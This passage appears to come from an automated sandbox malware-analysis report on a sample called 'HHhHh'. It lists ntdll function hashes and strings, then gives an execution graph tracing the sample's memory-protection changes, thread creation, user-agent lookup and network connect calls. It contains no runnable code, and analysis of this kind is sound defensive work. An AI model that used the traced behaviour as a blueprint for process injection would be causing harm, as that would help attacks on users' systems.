                                            • Opcode Fuzzy Hash: 0663d5dec119e6b267317fb69e5dd0a2cb26fd3e8b0ed79c10c49514e9a07f78
                                            • Instruction Fuzzy Hash: 6390023121140842D10071584408B86004597E0301F95C016A1524664DC615C9517621
                                            Function 012D2CF0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 137884038ffec52ebbdcc47ab66581607b40741eacf4916e0ea50002b5ffd7d5
                                            • Instruction ID: 13fa5ec95ccaaa16a6c18b035f9f36c3b2309e3ca5946ed45178beb2e68df1d4
                                            • Opcode Fuzzy Hash: 137884038ffec52ebbdcc47ab66581607b40741eacf4916e0ea50002b5ffd7d5
                                            • Instruction Fuzzy Hash: 5D90043131140403D100715C550C7470045D7D0301FD5D411F1C3457CDD757CD517331
                                            Function 012D2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6ee420bddcf4837ad46b12714e872255af9e112207c9f630eaeb9b2a42a4cf39
                                            • Instruction ID: 4ad7d17deeae9802f7618a1656b88f583cc5e123f64fe4e98e7ffa49a8a2eb06
                                            • Opcode Fuzzy Hash: 6ee420bddcf4837ad46b12714e872255af9e112207c9f630eaeb9b2a42a4cf39
                                            • Instruction Fuzzy Hash: A390043171540403D140715C541C7470055D7D0301FD5D011F1434574DC75DCF5577F1
                                            Function 012D2F60 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4f12fd0458c6e2a4f443907a0a2a473a41a21a4bdd8b0497006a419e406ae816
                                            • Instruction ID: 1a0a00816a2fceca28e11d7eac75a541b7c5b8991c4298c810c5bc1849bd50d0
                                            • Opcode Fuzzy Hash: 4f12fd0458c6e2a4f443907a0a2a473a41a21a4bdd8b0497006a419e406ae816
                                            • Instruction Fuzzy Hash: 5390026122140042D10471584408746008597E1201F95C012A3554564CC5298D615225
                                            Function 012D2FA0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 75492089099b184da42361f5896a75ba555b504ae114e57453d6ed888ab141ea
                                            • Instruction ID: 90b5eb2201d137347cbc4aa280b38b48121367adc76d1457d3b1e55cdb5e0156
                                            • Opcode Fuzzy Hash: 75492089099b184da42361f5896a75ba555b504ae114e57453d6ed888ab141ea
                                            • Instruction Fuzzy Hash: EE90023121180402D1007158480C787004597D0302F95C011A6564565EC665C9916631
                                            Function 012D2E30 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c69e00f496176f2201e6cdacb51f7ac1355fabf66b131d6e580cb7595e839540
                                            • Instruction ID: daed1319bde36760a60424e9c4fb36b670b50ca63a8e5476952c0875a63bc4a1
                                            • Opcode Fuzzy Hash: c69e00f496176f2201e6cdacb51f7ac1355fabf66b131d6e580cb7595e839540
                                            • Instruction Fuzzy Hash: 2890022131140402D102715844186460049D7D1345FD5C012E2824565DC6258A53A232
                                            Function 012D2EE0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1c2febdba192928181fe09537563f9a62fa21629804078e498663d79aaba4b4b
                                            • Instruction ID: 93fbf831af93c194ec40f689f7a5714506ed36e1c5c5897b018470a9356e5d9c
                                            • Opcode Fuzzy Hash: 1c2febdba192928181fe09537563f9a62fa21629804078e498663d79aaba4b4b
                                            • Instruction Fuzzy Hash: 7090026121180403D14075584808647004597D0302F95C011A3464565ECA298D516235
                                            Function 012D3010 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0f8c8b66f143e039d12d98f79767277122a11d802998e0586fd6e766c34b340d
                                            • Instruction ID: 813c97f7538349f3db19d2058452e543bf6945622dbca072dc9c6dc79c16aba5
                                            • Opcode Fuzzy Hash: 0f8c8b66f143e039d12d98f79767277122a11d802998e0586fd6e766c34b340d
                                            • Instruction Fuzzy Hash: 3D90022121184442D14072584808B4F414597E1202FD5C019A5556564CC91589555721
                                            Function 012D3090 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a77edab0bbf51bf3008246cbd95a9695d910d769afd2504239c8cf762fc484dc
                                            • Instruction ID: 18e1380f651b16f0d96f01c0bd3d4050bb74d16c453cfa360513c1a17432f8ab
                                            • Opcode Fuzzy Hash: a77edab0bbf51bf3008246cbd95a9695d910d769afd2504239c8cf762fc484dc
                                            • Instruction Fuzzy Hash: AD90022125140802D140715884187470046D7D0601F95C011A1424564DC6168A6567B1
                                            Function 012D35C0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c08c34feca32cca2c69886ae265b36b8d0865c0c4d93b3c6786ecd4ee89e639f
                                            • Instruction ID: 76e9f9290c2410b335a8bd960e433c2ce529729dcb28cfe67dfa6b3ebdb5ece1
                                            • Opcode Fuzzy Hash: c08c34feca32cca2c69886ae265b36b8d0865c0c4d93b3c6786ecd4ee89e639f
                                            • Instruction Fuzzy Hash: 1790023161550402D10071584518746104597D0201FA5C411A1824578DC7958A5166A2
                                            Function 012D39B0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8978fd59d31daae701b392058071a89c24fb5a13e849a7de7e4a020996a88605
                                            • Instruction ID: 1e875138d45d8b64b328527a228f60476a566d39fddd3897a06ef1f0b559f6d5
                                            • Opcode Fuzzy Hash: 8978fd59d31daae701b392058071a89c24fb5a13e849a7de7e4a020996a88605
                                            • Instruction Fuzzy Hash: CE90043135545103D150715C440C7574045F7F0301FD5C031F1C145F4DC555CD557331
                                            Function 012D3D10 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2cc81b5ed0fae0c6de79e1d72c025354ba30003ecbe696a7593284bbc3285946
                                            • Instruction ID: 522c50956121d1be2e06f11a875a8b332405a4ac2afc5b13c4ff31f66ef16a90
                                            • Opcode Fuzzy Hash: 2cc81b5ed0fae0c6de79e1d72c025354ba30003ecbe696a7593284bbc3285946
                                            • Instruction Fuzzy Hash: BA90023121240142954072585808A8E414597E1302BD5D415A1415564CC91489615321
                                            Function 012D3D70 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e1f0fce82e578f021c0e93de22292567e189e44eae4a62945a70e07b2c59f4de
                                            • Instruction ID: 83668aa48c166ef9cb9e744688e74404279ba4786bab43f43973d290da7b33a4
                                            • Opcode Fuzzy Hash: e1f0fce82e578f021c0e93de22292567e189e44eae4a62945a70e07b2c59f4de
                                            • Instruction Fuzzy Hash: 4190023521140402D51071585808686008697D0301F95D411A1824568DC65489A1A221
                                            Function 012D2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction ID: b434f23eadb45d2bbf040cf6e4b428e4045529900500362e4c0dfbdf5ff9bed2
                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction Fuzzy Hash:
                                            Function 012D2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: a7700cb3c5357c8eb3cac9546ea2d8753394e3a4478b81c1c86e126aca5ff319
                                            • Instruction ID: c785a4ea86b878151c5ea2a5f78839326f8a69454f8d5154093ea7cbeae54d05
                                            • Opcode Fuzzy Hash: a7700cb3c5357c8eb3cac9546ea2d8753394e3a4478b81c1c86e126aca5ff319
                                            • Instruction Fuzzy Hash: BA51F7B2A24257FFCB21DB9CC89097EFBF8BB082407508129F595D7681D374DE4087A0
                                            Function 01342410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 6f9412a6273180b5f29ec5b4be527f0675f446f40fa2bd199f7326fffcee4812
                                            • Instruction ID: 07ab0feb98f9b99f0cb227d26c943a9f6f839b35ad9bd96c142245d76abb6bc2
                                            • Opcode Fuzzy Hash: 6f9412a6273180b5f29ec5b4be527f0675f446f40fa2bd199f7326fffcee4812
                                            • Instruction Fuzzy Hash: 2851F475A00645AFCB20DE9CD89097FFBF8EF44204B448459F496E7681E6B4EA4087A0
                                            Function 012C7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                            Download Yara Rule
                                            Strings
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01304742
                                            • ExecuteOptions, xrefs: 013046A0
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 013046FC
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01304725
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01304787
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01304655
                                            • Execute=1, xrefs: 01304713
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            • Opcode ID: d236fb4c0fe76bed77718426412d83fa34f0679099ad7db911693281eecc3914
                                            • Instruction ID: 44361c348cc5c12825290d652f0f033abdf4c31ccada487432e77ba626a37b31
                                            • Opcode Fuzzy Hash: d236fb4c0fe76bed77718426412d83fa34f0679099ad7db911693281eecc3914
                                            • Instruction Fuzzy Hash: 6651493162021A6EEF15ABA8DC96FFE77ACEF14B04F14019DD705A7190E7709A458F50
                                            Function 012DB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-$0$0
                                            • API String ID: 1302938615-699404926
                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction ID: 6ec77f9a8248a176242b49740cf832d6493a23c35c911373f31fd0b44621cb7e
                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction Fuzzy Hash: E681D431E2524A9FEF298E6CC8727FEBBB1AF47350F1A4119DA51A72D1C7348840CB51
                                            Function 012BF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                            Download Yara Rule
                                            Strings
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 013002BD
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 013002E7
                                            • RTL: Re-Waiting, xrefs: 0130031E
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                            • API String ID: 0-2474120054
                                            • Opcode ID: 2f6f1c0b278b55da19f7d2c7e43308c1a9171c1cdbdadc8563a0cfbe0e03ab8f
                                            • Instruction ID: d11d6dc33e63f4e4a1b70da9d78c72fddbdb6cd4854009f19da82e491c3e196b
                                            • Opcode Fuzzy Hash: 2f6f1c0b278b55da19f7d2c7e43308c1a9171c1cdbdadc8563a0cfbe0e03ab8f
                                            • Instruction Fuzzy Hash: 17E1DF30624742DFD72ACF2CC995B6ABBE0BB84398F140A5DF6A58B2D1D774D844CB42
                                            Function 012CBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                            Download Yara Rule
                                            Strings
                                            • RTL: Resource at %p, xrefs: 01307B8E
                                            • RTL: Re-Waiting, xrefs: 01307BAC
                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01307B7F
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 0-871070163
                                            • Opcode ID: 3d779164e83452bfda8673896a91b4ca061900903dee6ad68b33107a2cbf93b0
                                            • Instruction ID: 025576d3bce7bbc4cdb493fcffc1e6a02e7886926b10287768c2142383d86112
                                            • Opcode Fuzzy Hash: 3d779164e83452bfda8673896a91b4ca061900903dee6ad68b33107a2cbf93b0
                                            • Instruction Fuzzy Hash: 564123353107039FD721DE29CC42B6AB7E5EF88B14F000A1DFA9A97780DB71E8058B91
                                            Function 012CB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                            Download Yara Rule
                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0130728C
                                            Strings
                                            • RTL: Resource at %p, xrefs: 013072A3
                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01307294
                                            • RTL: Re-Waiting, xrefs: 013072C1
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-605551621
                                            • Opcode ID: ddfcb57fdc73660ef6ed813a5a0d3c2cee5d8b7d950a0faedf9c14da3f63348a
                                            • Instruction ID: 088dcfc9cbfd9d297c3bd66f2c03822666b0cd35c246876e510600da137722fa
                                            • Opcode Fuzzy Hash: ddfcb57fdc73660ef6ed813a5a0d3c2cee5d8b7d950a0faedf9c14da3f63348a
                                            • Instruction Fuzzy Hash: 27413235710206ABC722CE29CC42F66B7E9FF54B58F10061CFA85AB280DB31F8068BD1
                                            Function 01342300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$]:%u
                                            • API String ID: 48624451-3050659472
                                            • Opcode ID: dba4e9a4b8eaeb6c5cc2912a055283b8deec88981eea4709ed36c713c3facf67
                                            • Instruction ID: e54e81d9e0bb9c68fa14bcc5010a3b689dd81261aca61d5f960dd882c97f39d3
                                            • Opcode Fuzzy Hash: dba4e9a4b8eaeb6c5cc2912a055283b8deec88981eea4709ed36c713c3facf67
                                            • Instruction Fuzzy Hash: CD314F72A106199FDB20DF29DC44BEFB7F8EB54614F84455AF949E3240EB30AA458BA0
                                            Function 012D7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-
                                            • API String ID: 1302938615-2137968064
                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction ID: 2138fadc6069f323928086e7fffd0551a17735c0200a6a1e2dc448a351d770f1
                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction Fuzzy Hash: FD91C171E202179FEB34DF6DC881ABEBBA5FF44328F24455AEA55E72C0D73889408751
                                            Function 01299126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$@
                                            • API String ID: 0-1194432280
                                            • Opcode ID: 8e93d4e03c4730be67e780d6be4ddca79557c29bdbe04bc7b0f6cb3ecebae372
                                            • Instruction ID: dac24d9e9fce0adc0cf537f2057f806be0cb9592644b0b6551f86a8ba64321b8
                                            • Opcode Fuzzy Hash: 8e93d4e03c4730be67e780d6be4ddca79557c29bdbe04bc7b0f6cb3ecebae372
                                            • Instruction Fuzzy Hash: 47810A71D1026ADBDF358B58CC45BEEB7B8AF49754F0041EAAA19B7240D7709E84CFA0

                                            Execution Graph

                                            Execution Coverage:2.3%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:4.7%
                                            Total number of Nodes:444
                                            Total number of Limit Nodes:16
                                            execution_graph 13741 11260b66 13743 11260b6a 13741->13743 13742 11260cce 13743->13742 13744 11260cb5 CreateMutexW 13743->13744 13744->13742 13897 112662e4 13898 1126636f 13897->13898 13899 11266305 13897->13899 13899->13898 13900 112660c2 6 API calls 13899->13900 13900->13898 13901 11263ce2 13903 11263dd9 13901->13903 13902 11264022 13903->13902 13907 11263352 13903->13907 13905 11263f0d 13905->13902 13916 11263792 13905->13916 13908 1126339e 13907->13908 13909 1126358e 13908->13909 13910 112634ec 13908->13910 13912 11263595 13908->13912 13909->13905 13911 11269232 NtCreateFile 13910->13911 13914 112634ff 13911->13914 13912->13909 13913 11269232 NtCreateFile 13912->13913 13913->13909 13914->13909 13915 11269232 NtCreateFile 13914->13915 13915->13909 13917 112637e0 13916->13917 13918 11269232 NtCreateFile 13917->13918 13920 1126390c 13918->13920 13919 11263af3 13919->13905 13920->13919 13921 11263352 NtCreateFile 13920->13921 13922 11263602 NtCreateFile 13920->13922 13921->13920 13922->13920 13738 1126672e 13739 1126676a 13738->13739 13740 11266788 connect 13738->13740 13739->13740 13592 1126abac 13593 1126abb1 13592->13593 13626 1126abb6 13593->13626 13627 11260b72 13593->13627 13595 1126ac2c 13596 1126ac85 13595->13596 13598 1126ac54 13595->13598 13599 1126ac69 13595->13599 13595->13626 13597 11268ab2 NtProtectVirtualMemory 13596->13597 13602 1126ac8d 13597->13602 13603 11268ab2 NtProtectVirtualMemory 13598->13603 13600 1126ac80 13599->13600 13601 1126ac6e 13599->13601 13600->13596 13605 1126ac97 13600->13605 13604 11268ab2 NtProtectVirtualMemory 13601->13604 13663 11262102 13602->13663 13607 1126ac5c 13603->13607 13608 1126ac76 13604->13608 13609 1126acbe 13605->13609 13610 1126ac9c 13605->13610 13649 11261ee2 13607->13649 13655 11261fc2 13608->13655 13613 1126acc7 13609->13613 13614 1126acd9 13609->13614 13609->13626 13631 11268ab2 13610->13631 13616 11268ab2 NtProtectVirtualMemory 13613->13616 13619 11268ab2 NtProtectVirtualMemory 13614->13619 13614->13626 13618 1126accf 13616->13618 13673 112622f2 13618->13673 13620 1126ace5 13619->13620 13691 11262712 13620->13691 13629 11260b93 13627->13629 13628 11260cce 13628->13595 13629->13628 13630 11260cb5 CreateMutexW 13629->13630 13630->13628 13632 11268adf 13631->13632 13640 11268ebc 13632->13640 13703 1125e8f2 13632->13703 13634 11268e5c 13635 1125e8f2 NtProtectVirtualMemory 13634->13635 13636 11268e7c 13635->13636 13637 1125e8f2 NtProtectVirtualMemory 13636->13637 13638 11268e9c 13637->13638 13639 1125e8f2 NtProtectVirtualMemory 13638->13639 13639->13640 13641 11261de2 13640->13641 13643 11261df0 13641->13643 13642 11261ecd 13645 1125e412 13642->13645 13643->13642 13726 11265382 13643->13726 13647 1125e440 13645->13647 13646 1125e473 13646->13626 13647->13646 13648 1125e44d CreateThread 13647->13648 13648->13626 13651 11261f06 13649->13651 13650 11261fa4 13650->13626 13651->13650 13652 1125e8f2 NtProtectVirtualMemory 13651->13652 13653 11261f9c 13652->13653 13654 11265382 ObtainUserAgentString 13653->13654 13654->13650 13657 11262016 13655->13657 13656 112620f0 13656->13626 13657->13656 13660 1125e8f2 NtProtectVirtualMemory 13657->13660 13661 112620bb 13657->13661 13658 112620e8 13659 11265382 ObtainUserAgentString 13658->13659 13659->13656 13660->13661 13661->13658 13662 1125e8f2 NtProtectVirtualMemory 13661->13662 13662->13658 13665 11262137 13663->13665 13664 112622d5 13664->13626 13665->13664 13666 1125e8f2 NtProtectVirtualMemory 13665->13666 13667 1126228a 13666->13667 13668 1125e8f2 NtProtectVirtualMemory 13667->13668 13669 112622a9 13668->13669 13670 112622cd 13669->13670 13672 1125e8f2 NtProtectVirtualMemory 13669->13672 13671 11265382 ObtainUserAgentString 13670->13671 13671->13664 13672->13670 13676 11262349 13673->13676 13674 1126249f 13675 1125e8f2 NtProtectVirtualMemory 13674->13675 13680 112624c3 13674->13680 13675->13680 13676->13674 13677 1125e8f2 NtProtectVirtualMemory 13676->13677 13678 11262480 13677->13678 13679 1125e8f2 NtProtectVirtualMemory 13678->13679 13679->13674 13681 11262597 13680->13681 13682 1125e8f2 NtProtectVirtualMemory 13680->13682 13683 1125e8f2 NtProtectVirtualMemory 13681->13683 13684 112625bf 13681->13684 13682->13681 13683->13684 13687 112626b9 13684->13687 13689 1125e8f2 NtProtectVirtualMemory 13684->13689 13685 112626e1 13686 11265382 ObtainUserAgentString 13685->13686 13688 112626e9 13686->13688 13687->13685 13690 1125e8f2 NtProtectVirtualMemory 13687->13690 13688->13626 13689->13687 13690->13685 13692 11262767 13691->13692 13693 1125e8f2 NtProtectVirtualMemory 13692->13693 13697 11262903 13692->13697 13694 112628e3 13693->13694 13695 1125e8f2 NtProtectVirtualMemory 13694->13695 13695->13697 13696 112629b7 13698 11265382 ObtainUserAgentString 13696->13698 13699 1125e8f2 NtProtectVirtualMemory 13697->13699 13700 11262992 13697->13700 13701 112629bf 13698->13701 13699->13700 13700->13696 13702 1125e8f2 NtProtectVirtualMemory 13700->13702 13701->13626 13702->13696 13704 1125e987 13703->13704 13706 1125e9b2 13704->13706 13718 1125f622 13704->13718 13707 1125eba2 13706->13707 13710 1125eac5 13706->13710 13712 1125ec0c 13706->13712 13708 1126ae12 NtProtectVirtualMemory 13707->13708 13709 1125eb5b 13708->13709 13709->13712 13713 1126ae12 NtProtectVirtualMemory 13709->13713 13722 1126ae12 13710->13722 13712->13634 13713->13712 13714 1125eae3 13714->13712 13715 1125eb3d 13714->13715 13716 1126ae12 NtProtectVirtualMemory 13714->13716 13717 1126ae12 NtProtectVirtualMemory 13715->13717 13716->13715 13717->13709 13719 1125f67a 13718->13719 13720 1125f67e 13719->13720 13721 1126ae12 NtProtectVirtualMemory 13719->13721 13720->13706 13721->13719 13723 1126ae45 NtProtectVirtualMemory 13722->13723 13724 11269942 13722->13724 13725 1126ae70 13723->13725 13724->13723 13725->13714 13727 112653c7 13726->13727 13730 11265232 13727->13730 13729 11265438 13729->13642 13731 1126525e 13730->13731 13734 